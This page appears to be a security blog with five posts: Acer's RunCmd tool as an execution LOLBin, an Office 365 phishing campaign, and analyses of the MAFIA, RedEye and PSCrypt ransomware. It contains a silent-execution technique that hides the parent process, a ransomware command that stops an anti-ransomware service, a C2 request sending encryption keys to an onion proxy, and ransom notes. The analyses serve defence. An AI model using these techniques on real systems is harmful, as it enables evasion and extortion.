Sunday, March 17, 2019

Run applications and scripts using Acer's RunCmd


This weekend I was cleaning up an old Acer laptop of mine and discovered a hidden folder on the root drive, C:\OEM.

Inside's a bunch of interesting files, one of these is a tool called RunCmd_X64.exe.

The file is a legitimate and signed binary by Acer:

Figure 1 - Signed RunCmd_X64




















The tool contains a useful help file as follows:

A tool to execute a command file.
RunCmd.exe filepath [/T | /F]
filepath full path name or file name
/T launch command file and open the console window
/F launch command file and hide the console window
If there is not any flag, /T or /F, the default situation is hiding window
Examples:
RunCmd.exe "D:\EnBT.cmd" /T
RunCmd.exe "EnBT.cmd" /F

Simply put, you can use Acer's tool as an alternative to the built-in command prompt, and to launch other applications! Additionally, using the /F parameter or flag will hide the console window, which is by default if there isn't any parameter!

Some simple examples:

Run an application directly

Figure 2 - Running calc.exe














Run virtually anything using a script 

Figure 3 - Running calc using a batch file










Note that since no parameter is used, the RunCmd tool will run silently and tools such as Process Explorer show a non-existent parent process.

In theory, you can run any script or scriptlet using Acer's tool to execute "command files" :)

For attackers

This "LOLBin", or at the least reusing a legitimate and signed binary for malicious purposes, has the following MD5 hash:

RunCmd_X64 - d71fb1b03bf84fae29af9b2dc525ba33

There is also a 32-bit version, however, this binary is not signed.

RunCmd - 4d50588568cae95331f00cbdb52be37a


For defenders

See "For attackers". Additionally, the RunCmd tool will attempt to create a folder named "RunCmdLog" to store logfiles. An example logfile is as follows:

2019-03-17 21:00:37 [  193C] TRACE main - ENTER: main
2019-03-17 21:00:37 [  193C] TRACE main - EXIT: main
2019-03-17 21:00:37 [  193C] INFO main - Para 1: calc.bat
2019-03-17 21:00:37 [  193C] INFO main - Para 2:
2019-03-17 21:00:37 [  193C] INFO main - command: C:\Tools\Acer\calc.bat
2019-03-17 21:00:37 [  193C] INFO main - command success
Log files will have the following format:
%s%02d-%02d-%02d %02d-%02d-%02d.log

Where %s is RunCmd and %02d is the date and time of execution. In our example above:
RunCmd2019-03-17 21-00-37.log

Why try using LOLBins when you can use tools installed by the manufacturer?


Resources

Github - Living Off The Land Binaries and Scripts (and also Libraries)
Hexacorn - Reusigned Binaries – Living off the signed land


Monday, March 4, 2019

Analysing a massive Office 365 phishing campaign


Last week, a friend of mine reached out with a query: a contact in his address book had sent him a suspicious email. As it turns out, it was. In this blog post, we'll have a quick look at an Office 365 phishing campaign, which turned out to be massive. This type of phishing has been on the rise for a while now (at least since 2017), and it's important to point out, as seemingly attacks are only increasing.


Analysis

As mentioned earlier, Office 365 (O365) phishing isn't new, but it is definitely prevalent. A high-level overview of a typical attack is as follows:

Figure 1 - High-level overview of typical O365 phishing
















A typical flow of such an attack may be as follows:


  1. An attacker sends an O365 spearphishing email, likely from a spoofed or fake email address;
  2. The user is enticed to click on the link, or open the attachment which includes a link;
  3. The user will then unknowingly enter their credentials on the fake O365 page;
  4. Credentials get sent back to the attacker;
  5. Attacker will access the now compromised user's mailbox; and,
  6. The cycle repeats: the attacker will send spearphish emails to all of the compromised user's contacts - with this difference, it's coming from a legitimate sender.
This is exactly what happened to a friend of mine: he got sent an email from a legitimate email address, which was a contact in his address book - only the sender never intentionally sent this email! 

Let's have a look at the infection chain.

The initial email

The initial email sent looked as follows:

Figure 2 - "P.AYMENT COPY"












Clicking on the "OPEN" button would redirect you to a legitimate but compromised Sharepoint (part of O365) webpage. Seeing as a legitimate business has been compromised, I won't post the link here. Its web administrators have been notified.


Figure 3 - "Access OneDrive"













The PDF document

Next step is hosting a PDF named "INVOICE.PDF", which entices the user to access OneDrive to view the shared file. If the user were to click on "OPEN PDF HERE":


Figure 4 - "Login with Office 365"















URI: https://happymachineit[.]info/Michael/b4fb042ba2b3b35053943467ac22a370/OFE1.htm

The final landing or phishing page


Finally, clicking on "Login with Office 365" will redirect the user to the final phishing page, which will look as follows:

Figure 5 - Final landing page
















The final landing page is as follows:
https://happymachineit[.]info/Michael/b4fb042ba2b3b35053943467ac22a370/7hsfabvj2b0b9rguzbzw910d.php

When entering credentials, they will be sent off to the attacker, and the cycle from Figure 1 will repeat itself. Note that other scenarios are possible, for example:
  1. The attacker may try to (re-)sell credentials that have been gathered so far on criminal forums
  2. The attacker may send more targeted spearphishes to potentially interesting victims
  3. The attacker may attempt to access other services or accounts using the same user/password combination
In short, there's countless other possibilities.

The phishing infrastructure

Avid readers will have noticed the phishing website uses a valid SSL certificate, which has the following details:


  • Subject DN: CN=happymachineit.info
  • Issuer DN: C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority
  • Serial: 169382499542171049850152621295591104087
The SSL cert was issued by Comodo in January. Details can be found on Censys.io.

An additional email address is connected with "happymachine": fudtoolshop@gmail.com

The phishing website encountered here, https://happymachineit[.]info, is hosted on the following IP: 178.159.36[.]107

Pivoting on that IP brings us to the following SSL certificate details:

emailAddress=ssl@server.localhost.com, CN=server.localhost.com

This means the certificate is a local and self-signed one. In other words, if you are accessing a secure website, and you see "server.localhost.com" as the SSL certificate, do NOT trust it. This is sometimes from an automatic setup from the hosting provider.

As a side-note, a search for the Common Name (CN) mentioned above with Censys currently yields 473 (unexpired certs) results: https://censys.io/certificates?q=%28server.localhost.com%29+AND+tags.raw%3A+%22unexpired%22&

Performing a search with RiskIQ's PassiveTotal as well as VirusTotal, and after filtering results, we obtain a whopping total of 875 unique Office 365 phishing sites, hosted on that IP alone! It appears this campaign has been active since December 2018.

Searching a bit further, it appears the whole ASN (which is a collection of IP prefixes controlled by a single entity, typically an ISP), AS48666 is in fact riddled with Office 365 as well as other phishing sites. Using URLscan.io we can quickly gauge the ASN is hosting multiple phishing sites for Office 365 as well as Adobe:

Figure 6 - AS48666 hosting badness










General Info:

  • Geo: Russian Federation (RU) — 
  • AS: AS48666 - AS-MAROSNET Moscow, Russia, RU 
  • Registrar: RIPENCC

As shown in this blog post, one IP address can host tons of phishing instances, while the ASN controls multiple IPs. Bonus bad IP: 178.159.36[.]120. 


Detection

For the phishing websites itself, any network traffic that resolves to the IP above.

I've noticed there are countless similar PDFs from this same campaign. Due to the way these are created (likely in bulk), a simple Yara rule can be developed as follows:











The Yara rule can be found on Pastebin here or on Github Gist here.

Note: in specific instances, this rule may false-positive - so use at your own will.

The following MITRE ATT&CK techniques are relevant:



Disinfection

There isn't much to disinfect, since there's no actual malware involved.

However, if you have been affected by this phishing campaign, do the following immediately:

  • Contact your network and/or system administrator or managed services provider if you have one and wait for their response - if not;
  • Note down the phishing page/URL, then close any open phishing pages - in fact, close the whole browser;
  • Perform an antivirus scan with your installed product, and a scan with another application, for example Malwarebytes (better be safe than sorry);
  • Change your O365 password immediately;
  • Change passwords on other websites where you used the same combination;
  • Reach out to the people in your address book you were compromised and they are not to open your email(s) or at least not any attachments or links from your email(s);
  • Verify your "Sent" emails folder (or "Outbox") for any suspicious activity. If there are no Sent emails - the attacker may have deleted them, or you may have a full compromise on your hands.;
  • Verify any (newly) created rules in your mail application (in this case O365), for example, verify there are no new forwarding rules or perhaps rules that delete new incoming emails - forwarding rules and deletion rules are sometimes set up by an attacker to gather more information or as an attempt to remain hidden; and,
  • File a complaint with your CERT, local police station, or whichever authority would handle such cases. If you are unsure how to do so, have a look here for assistance.


Prevention

  • Block the IP (or whole subnet 178.159.36[.]0/24) mentioned in this report in your firewall or proxy or other appliance;
  • Use strong and preferably unique passwords (use a password manager);
  • Set up 2FA for accounts or, preferably, MFA (multi-factor authentication);
  • Enable, deploy or implement anti-spam and anti-phishing protection;
  • Enable, deploy, or implement a URL phishing filter;
  • Trust, but verify: "did this contact really need to send me a "Payment Copy"? - if needed, verify via a phone call - not via email;
  • Be generally cautious with links and attachments. Do not click on links or open attachments from unknown senders;
  • If possible, use Firefox with NoScript enabled; and,
  • If you're in an organisation: create or organise user awareness training.

Conclusion

Phishing has been around for a long time - Office 365 phishing, on the other hand, has been around since, well, Office 365 was created. Every time a new service is created, you can imagine that phishing emails targeting that service will follow - maybe one month later, perhaps a year later - but they will.

Always try to be vigilant and follow the prevention tips mentioned above to stay safe.

As a side-note, the real Office 365 page is: https://outlook.office365.com/owa

You may find more information in the Resources section below.

Resources

Blaze's Security Blog - Cybercrime Report Template
Decent Security - Easily Report Phishing and Malware
Microsoft - Anti-phishing protection in Office 365
Microsoft - Microsoft publishes guidance to boost public sector cloud security
Microsoft - Set up multi-factor authentication
Microsoft - Set up Office 365 ATP anti-phishing and anti-phishing policies

Indicators


Sunday, August 12, 2018

MAFIA ransomware targeting users in Korea


A new ransomware family was discovered and sent to me by MalwareHunterTeam, which we'll call MAFIA due to the extension it uses to encrypt files. The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.

Another interesting (and new to me) feature is the use of "Onion.Pet", a Tor proxy as a means for C2 (network) communication. Read the analysis below to find out more details on this ransomware. (not to be confused with MafiaWare, a Hidden Tear variant - the MAFIA ransomware described here is unique).


Analysis

It's currently unknown how the MAFIA ransomware reaches a system, but it's likely delivered via spear-phishing, rather than a manual installation. The binary analysed here has the following properties:

Properties:
First, MAFIA will attempt to stop a service named "AppCheck" by launching the following command (which will use an elevated CMD prompt):

sc stop AppCheck

Ransomware usually stops database processes, for it to be able to also encrypt database-files which may be in use by said processes. However, in this case, AppCheck is actually a service which belongs to an anti-ransomware product from South-Korea. Figure 1 shows a screenshot of its website.

Figure 1 - "100% Signatureless Anti-Ransomware" - https://www.checkmal.com/?lang=en

As for the effectiveness of this software: no idea, but the author deemed it important enough to include it, so either it has proven it works, or it is used by a lot of users and businesses.

The author of the MAFIA ransomware has also left a debug path, which mentions the name "Jinwoo" ("진우" in Korean), and may be an indicator of the developer's nationality.

MAFIA makes use of OpenSSL to encrypt files, which it does with AES-256 in CBC mode. As mentioned earlier, encrypted files will obtain the ".MAFIA" extension. For example; Penguins.jpg becomes Penguins.jpg.MAFIA.

Files with the following extensions (300 in total) will be encrypted:

.3dm, .3ds, .3fr, .3g2, .3gp, .3pr, .ab4, .accdb, .accde, .accdr, .accdt, .ach, .acr, .act, .adb, .ads, .agdl, .ait, .apj, .arw, .asf, .asm, .asp, .asx, .avi, .back, .backup, .backupdb, .bak, .bank, .bay, .bdb, .bgt, .bik, .bkp, .bkp, .blend, .bpw, .cdf, .cdr, .cdr3, .cdr4, .cdr5, .cdr6, .cdrw, .cdx, .ce1, .ce2, .cer, .cfp, .cgm, .cib, .class, .cls, .cmt, .cpi, .cpp, .cr2, .craw, .crt, .crw, .csh, .csl, .csv, .dac, .db-journal, .db3.dbf, .dc2, .dcr, .dcs, .ddd, .ddoc, .ddrw, .dds, .der, .des, .design, .dgc, .djvu, .dng, .doc, .docm, .docx, .dot, .dotm, .dotx, .drf, .drw, .dtd, .dwg, .dxb, .dxf, .dxg, .eml, .eps, .erbsql, .erf, .exf, .fdb, .ffd, .fff, .fhd, .fla, .flac, .flv, .fpx, .fxg, .gray, .grey, .gry, .hbk, .hpp, .ibank, .ibd, .ibz, .idx, .iif, .iiq, .incpas, .indd, .java, .jpe, .jpeg, .jpg, .kc2, .kdbx, .kdc, .key, .kpdx, .lua, .m4v, .max, .mdb, .mdc, .mdf, .mef, .mmw, .moneywell, .mos, .mov, .mp3, .mp4, .mpg, .mrw, .msg, .myd, .ndd, .nef, .nk2, .nop, .nrw, .ns2, .ns3, .ns4, .nsd, .nsf, .nsg, .nsh, .nwb, .nx2, .nx1, .nyf, .oab, .obj, .odb, .odc, .odf, .odg, .odm, .odp, .ods, .odt, .oil, .orf, .ost, .otg, .oth, .otp, .ots, .ott, .p12, .p7b, .p7c, .pab, .pages, .pas, .pat, .pcd, .pct, .pdb, .pdd, .pdf, .pef, .pem, .pfx, .php, .plc, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .prf, .psafe3, .psd, .pspimage, .pst, .ptx, .qba, .qbb, .qbm, .qbr, .qbw, .qbx, .qby, .r3d, .raf, .rar, .rat, .raw, .rdb, .rtf, .rw2, .rw1, .rwz, .s3db, .sas7bdat, .say, .sd0, .sda, .sdf, .sldm, .sldx, sqlite, .sqlite3, .sqlitedb, .srf, .srt, .srw, .st4, .st5, .st6, .st7, .st8, .stc, .std, .sti, .stw, .stx, .svg, .swf, .sxc, .sxd, .sxg, .sxi, .sxm, .sxw, .tex, .tga, .thm, .tlg, .txt, .vob, .wallet, .wav, .wb2, .wmv, .wpd, .wps, .xll, .x3f, .xis, .xla, .xlam, .xlk, .xlm, .xlr, .xls, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .ycbcra, .yuv, .zip, .alz, .jar, .png, .bmp, .a00, .gif, .egg

Note: because the MAFIA ransomware uses OpenSSL for encryption, the process is slow, and the user may be able to interrupt it by killing the process (typically named winlogin.exe), or by shutting down the machine.

Figure 2 shows a side-by-side visual representation of the original (left) and encrypted image (right).


Figure 2 - Comparison (the blue represents ASCII strings)

MAFIA will also create a ransom note in HTML named "Information" in the same location as the original dropper. Ironically enough, the ransom note will also have the ".mafia" extension appended - the file will not be encrypted however.

Figure 3 shows the ransom note, in a browser.

Figure 3 - Ransom note

The text translates from Korean ("고유넘버") as "Unique number", and appears to contain two unique identifiers.

As mentioned earlier, MAFIA will use a Tor proxy for C2 communication; an example request is as follows:

GET /mafiaEgnima.php?iv=0x9e0x4b0x410x5c0x480x3a0xf40x90x2f0xfa0x960xb90x9b0x830xd40xb7&key=0xb90x1e0x600x3d0xef0x6c0xe60x930x6d0xab0x420x7b0x50x350xf00xcd0x3c0x490xc30x5f0xa10xe0xda0x270x5d0xd50xd10xa40xc0x9f0x340x79&seq=cbdf395c9281ae2ec52a306b5c29ec5 HTTP/1.1
Host: wibkilmskir4rlxz.onion.pet
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36

It appears the ransomware tries to send out an encryption key and IV using an HTTP GET request, which could make it possible to decrypt files, granted the network traffic is inspected at that point.

There's several other binaries of MAFIA out there, such as:

f4b25591ae53504ef5923344a9f03563
da23c8a7be5d83ae3e6b7b3291fdb880
0776e348313c7680db86ed924cff10b8
6487edd9b1e7cf6be4a9b1ac57424548
119228fb8f4333b1c10ff03543c6c0ea

Three of these (119228fb8f4333b1c10ff03543c6c0ea, 0776e348313c7680db86ed924cff10b8 and 6487edd9b1e7cf6be4a9b1ac57424548) have a different C2 server, specifically:
wibkilmskir4rlxz.onion[.]plus.

Neither of these servers appeared to be online at time of writing.

Decryption is possible thanks to Michael Gillespie (@demonslay335).

Download the decrypter from:
https://download.bleepingcomputer.com/demonslay335/MAFIADecrypter.zip

In case of questions or feedback, be sure to leave a comment.


Indicators




Wednesday, June 6, 2018

RedEye ransomware: there's more than meets the eye



A rather anonymous account reached out to me on Twitter asking to check out a "scary & really nasty" sample.

It turned out to be RedEye ransomware, a new strain or variant by the same creator of Annabelle ransomware, which I discovered in February earlier this year.


Analysis

This ransomware is named "RedEye" by the author "iCoreX".














Properties:

The first noticeable thing about this file is the huge filesize: 35.0 MB (36657152 bytes). This is due to several media files, specifically images and audio files, embedded in the binary.

It contains three ".wav" files:
  • child.wav
  • redeye.wav
  • suicide.wav
All three audio files play a "creepy" sound, intended to scare the user. 

Additionally, the binary is protected with ConfuserEx, compression, and a few other tricks. It also embeds another binary, which is responsible for replacing the MBR, which has the following properties:

  • MD5: 878a10cda09fec2cb823f2b7138b550e
  • SHA1: db44dae60c12853cdbe62ec9f7b3493a897e519a
  • SHA256: f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7
  • Compilation timestamp (Delphi): 1992-06-19 22:22:17
  • Compilation timestamp (Actual): 2018-06-04 14:23:36
  • VirusTotal report:
    f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7


What actually happens when executing this ransomware? Just like Annabelle ransomware it will perform a set of actions to make removal quite difficult, for example; it will disable task manager and in this iteration, will also hide your drives.

Similar to before, a ransom message is then displayed as follows:

Figure 1 - RedEye Ransomware


The message reads:

All your personal files has been encrypted with an very strong key by RedEye!
(Rijndael-Algorithmus -  AES - 256 Bit)
The only way to get your files back is:
- Go to http://redeye85x9tbxiyki.onion/tbxIyki - Enter your Personal ID
and pay 0.1 Bitcoins to the adress below! After that you need to click on
 "Check Payment". Then you will get a special key to unlock your computer.
You got 4 days to pay, when the time is up,
then your PC will be fully destroyed!


The ransomware has several options which I won't be showing here, but in short, it can:

  • Show encrypted files
  • Decrypt files
  • Support
  • Destroy PC

The Destroy PC option shows a GIF as background where you have the option to select "Do it" and "Close". I won't display the image however.

RedEye claims to encrypt files securely with AES256. On my machine, it appears to overwrite or fill files with 0 bytes, rendering the files useless, and appending the ".RedEye" extension.

The machine will, when the time runs out or when the "Do it" option is selected, reboot and replace the MBR, again similar to Annabelle ransomware, with the following message:


Figure 2 - MBR lock screen

The message reads as follows:


RedEye Terminated your computer! 
The reason for that could be:
- The time has expired
- You clicked on the 'Destroy PC' button
 
There is no way to fix your PC! Have Fun to try it :)
My YouTube Channel: iCoreX <- :p="" br="" subscribe="">Add me on discord!iCoreX#3333 <- account="" amp="" annabelle="" by="" creator="" discord.="" discord="" got="" i="" icorex="" jigsaw="" my="" named="" of="" old="" ransomware="" redeye="" terminated="">


The author, iCoreX, claims to have created Jigsaw, Annabelle, and now the RedEye ransomware - whether the former is true or not, I'll leave in the middle.

Details on the ransomware:

Extension: .RedEye
BTC Wallet: 1JSHVxXnGDydVXVamFW9AEmk3vk8cF8Vuj
Payment portal: (currently offline): http://redeye85x9tbxiyki[.]onion

Currently, it doesn't appear any payments have been made as of yet:


Removal

You may be able to restore the MBR, or your files, if you catch the ransomware in the act, and shutdown the machine at that point. Reboot in safe mode and copy over or back-up your files.

If tools such as the registry editor are not working, run Rkill in safe mode first.

Then, Restore the MBR, and reinstall Windows.

You may also try to restore the MBR first, and consequently attempt to restore files using Shadow Volume Copies. For example, a tool such as Shadow Explorer can be of assistance, or read the tutorial here.

If that doesn't work either, you may try using a data recovery program such as PhotoRec or Recuva



Conclusion


While it appears that the RedEye ransomware has even more tricks up its sleeve than its predecessor Annabelle, the same conclusion holds true: do not pay the ransomware.

As for the actual purpose of the ransomware: it may be considered a ransomware of the wiper kind, however, it appears the author likes to showcase his or her skill.

You can read more on the purpose of ransomware here.



IOCs

Monday, May 7, 2018

PSCrypt ransomware: back in business


PSCrypt is ransomware first discovered last year, in 2017, targeting users and organisations alike in Ukraine, and the malware itself is based on GlobeImposter ("GI") ransomware.

I've written about PSCrypt in the past, when it was distributed via Crystal Finance Millenium's hacked website: Crystal Finance Millennium used to spread malware

In this quick blog post, we'll take a look at the latest iteration of PSCrypt.


Analysis

A file named "xls.scr", which sports a fancy "energy" or "power" icon is responsible for loading PSCrypt on the machine, and was spread via a phishing campaign.

Figure 1 - Icon

The ransomware has the following properties:


As mentioned earlier, PSCrypt is based on GlobeImposter and as such, has very similar functionality.

The following folders are excluded from being encrypted:

Avast, Avira, COMODO, Chrome, Common Files, Dr.Web, ESET, Internet Explorer, Kaspersky Lab, McAfee, Microsoft, Microsoft Help, Microsoft Shared, Microsoft.NET, Movie Maker, Mozilla Firefox, NVIDIA Corporation, Opera, Outlook Express, ProgramData, Symantec, Symantec_Client_Security, Windows, Windows App Certification Kit, Windows Defender, Windows Kits, Windows Mail, Windows Media Player, Windows Multimedia Platform, Windows NT, Windows Phone Kits, Windows Phone Silverlight Kits, Windows Photo Viewer, Windows Portable Devices, Windows Sidebar, WindowsPowerShell, Wsus, YandexBrowser, ntldr, spytech software, sysconfig, system volume information

This iteration of PSCrypt will encrypt all files, including executables, except those files with the following extensions:

.$er,.4db,.4dd,.4d,.4mp,.abs,.abx,.accdb,.accdc

As usual, a temporary batch file will be used to clear Volume Shadow Copies as well as Event Logs:

Figure 2 - Batch file

What's new in this iteration of PSCrypt is not only the changes implemented by/via GlobeImposter ransomware, but also the ransom note itself, as noted in Figure 3 and 4 below:

Figure 3 - Ransomware note, part 1

Figure 4 - Ransomware note, part 2

The title of the ransom note is "Ваші файли тимчасово зашифрувати! Не хвилюйтесь!", which translates to "Your files are temporarily encrypted! Do not worry!".


The Ukrainian version is rather lenghty, and is as follows:

☠ ВАШІ ФАЙЛИ ТИМЧАСОВО НЕДОСТУПНІ.☠
ВАШІ ДАНІ БУЛИ ЗАШІВРОВАННИ!
Для відновлення даних потрібно дешифратор.
Щоб отримати дешифратор, ви повинні, оплатити послуги розшифровки:
Оплата відбувається за коштами біткойн на кошелек № 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9
Вартість послуги складає 150$
Оплату можна провести в терміналі IBox. або виберіть один з обмінних сайтів на сторінці - https://www.bestchange.ru/privat24-uah-to-bitcoin.html (приклад обмін Приват24 на BTC) також можете скористатися послугами https://e-btc.com.ua
Додаткова інформація:
Програма можемо дешифрувати один файл як доказ того, що у неї є декодер. Для цього необхідно надіслати зашифрований файл - вагою не більше 2 mb, и ваш уникальный идентификационный код, на пошту: systems32x@gmail.com
Более детальная инструкция по оплате: https://btcu.biz/main/how_to/buy
Увага!
Всі файли розшифровуються тільки після 100% оплати
Ви дійсно отримуєте дешифратор після оплати
Не намагайтеся видалити програму або запустити антивірусні інструменти це може ускладнити вам роботу
Спроби самодешіфрованія файлів приведуть до втрати ваших даних
Декодери інших користувачів не сумісні з вашими даними, оскільки унікальний ключ шифрування кожного користувача.
За запитом користувачів, надаємо контакти клієнтів, які вже користувалися послугами нашого сервісу.
ОБОВ'ЯЗКОВО ЗАПИШІТЬ РЕЗЕРВНІ КОНТАКТИ ДЛЯ ЗВ'ЯЗКУ:
systems32x@gmail.com - основний
systems32x@yahoo.com - резервний
Додаткові контакти:
systems32x@tutanota.com - (якщо відповіді не прийшло після 24-х годин)
help32xme@usa.com - (якщо відповіді не прийшло після 24-х годин)
Additional.mail@mail.com - (якщо відповіді не прийшло після 24-х годин)
З повагою
Unlock files LLC
33530 1st Way South Ste. 102
Federal Way, WA 98003
United States

Google Translation, so pretty loose - I've made some minor corrections however:

☠ YOUR FILES ARE TEMPORARILY UNAVAILABLE
YOUR DATA WAS LOCKED!
To restore data you need a decoder.
To receive a decoder, you must pay for decoding services:
Payment is made at the expense of bitcoin to wallet number 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9
Service cost is $ 150
Payment can be made at the terminal IBox. or select one of the exchange sites on the page - https://www.bestchange.ru/privat24-uah-to-bitcoin.html (example exchange of Privat24 to the BTC), you can also use the services of https://e-btc.com.ua.
Additional Information:
The program can decrypt one file as proof that it has a decoder. To do this, you need to send an encrypted file weighing no more than 2 mb and your unique identification code by mail: systems32x@gmail.com
More detailed payment instructions: https://btcu.biz/main/how_to/buy
WARNING!
All files are decrypted only after 100% payment
You really get a decoder after payment
Do not try to uninstall a program or run antivirus tools, which can complicate your work
Attempts to self-decrypt files will result in the loss of your data
Other users' decoders are not compatible with your data, as the unique encryption key for each user.
At the request of users, we provide contact with customers who have already used the services of our service.
MUST REQUEST BACK TO CONTACTS FOR CONNECTION:
systems32x@gmail.com - basic
systems32x@yahoo.com - backup
Additional contacts:
systems32x@tutanota.com - (if the answer did not arrive after 24 hours)
help32xme@usa.com - (if the answer did not arrive after 24 hours)
Additional.mail@mail.com - (if the answer did not arrive after 24 hours)

The English version is rather short and to the point:

ALL DATA IS ENCRYPTED!
For decoding, write to the addresses:systems32x@gmail.com - Basic systems32x@yahoo.com - backup Additional contacts: systems32x@tutanota.com - (if the answer did not arrive after 24 hours) help32xme@usa.com - (if the answer did not arrive after 24 hours) Additional.mail@mail.com - (if the response did not arrive after 24 hours) 

The cost for restoring service is, interestingly enough, expressed in US dollars this time ($150), as opposed to Ukrainian currency in a previous iteration.

However, the images which included IBox instructions (as payment method) have been removed, and while IBox is still suggested as a service, there's also a new website introduced to pay via Bitcoin using E-BTC. 

E-BTC is a Ukrainian service which is "the most reliable and simple service for buying and selling Bitcoins and also the best partner for entering and withdrawing funds to the WEX stock exchange."

It also promises full anonymity.

Back to the ransomware. Encrypted files will have the .docs extension appended, for example Jellyfish.jpg becomes Jellyfish.jpg.docs.

Ransom note: .docs document.html
BTC Wallet: 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9
Emails: systems32x@gmail.com, systems32x@yahoo.com, systems32x@tutanota.com, help32xme@usa.com, Additional.mail@mail.com

Extension: .docs

Fortunately, it appears no payments have been made as of yet: 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9



Conclusion

The last iteration of PSCrypt was observed in 2017, but it appears it has now returned to try and coerce users and organisations to pay the ransomware.

As usual, follow the prevention tips here to stay safe, but the rule of thumbs are as always:

  • Do not pay, unless there is imminent danger of life
  • Create regular backups, and do not forget to test if they work

IOCs follow below.


IOCs